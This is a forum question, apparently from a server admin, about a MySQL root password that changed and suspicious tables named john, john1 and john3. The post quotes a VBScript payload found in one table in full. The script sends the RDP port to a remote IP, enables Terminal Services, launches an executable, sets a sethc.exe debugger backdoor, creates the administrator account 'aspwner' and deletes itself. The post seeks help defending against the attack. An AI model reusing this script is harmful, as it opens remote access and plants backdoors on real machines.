我最近遇到了一个问题,即MySQL的root密码以某种方式被改变了。我已经重置它,虽然它可能只是一个腐败,我做了一些挖掘。在MySQL数据库本身中,我找到了3个名为john,john1和john3的表。
这些表中的第一个有一个很长的记录,其中有以下是人类可读的:
on error resume next
Set fso8 = CreateObject("Scripting.FileSystemObject")
Set ObjFSO2 = CreateObject("Scripting.FileSystemObject")
If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then
ObjFSO2.DeleteFile Wscript.ScriptFullName
WScript.quit
else
end if
Set OperationRegistry=WScript.createObject("WScript.Shell")
Dim TSPort,TSState,TSRegPath
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"
TSPort=OperationRegistry.RegRead(TSRegPath)
Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://42.51.151.7:8002/mof.asp?IPnumber=" & TSPort,0
xPost.Send()
set obj=wscript.createObject("wscript.shell")
obj.Run "cmd /c sc config TermService start= auto",vbhide
obj.Run "cmd /c sc start TermService",vbhide
obj.Run "cmd /c start c:/windows/system/const.exe",vbhide
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\taskmgr.exe","REG_SZ"
Set o=CreateObject("Shell.Users")
Set z=o.create("aspwner")
z.changePassword "qq25896!@#",""
z.setting("AccountType")=3
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFile Wscript.ScriptFullName
WScript.quit
====
是否有人能够对这可能是什么有所了解?我对这些表格有点怀疑。我不想在没有先了解它们可能是什么的情况下删除它们,因为它是一个生产MySQL安装。
在Ubuntu 13.10系统上,MySQL版本为5.5.35。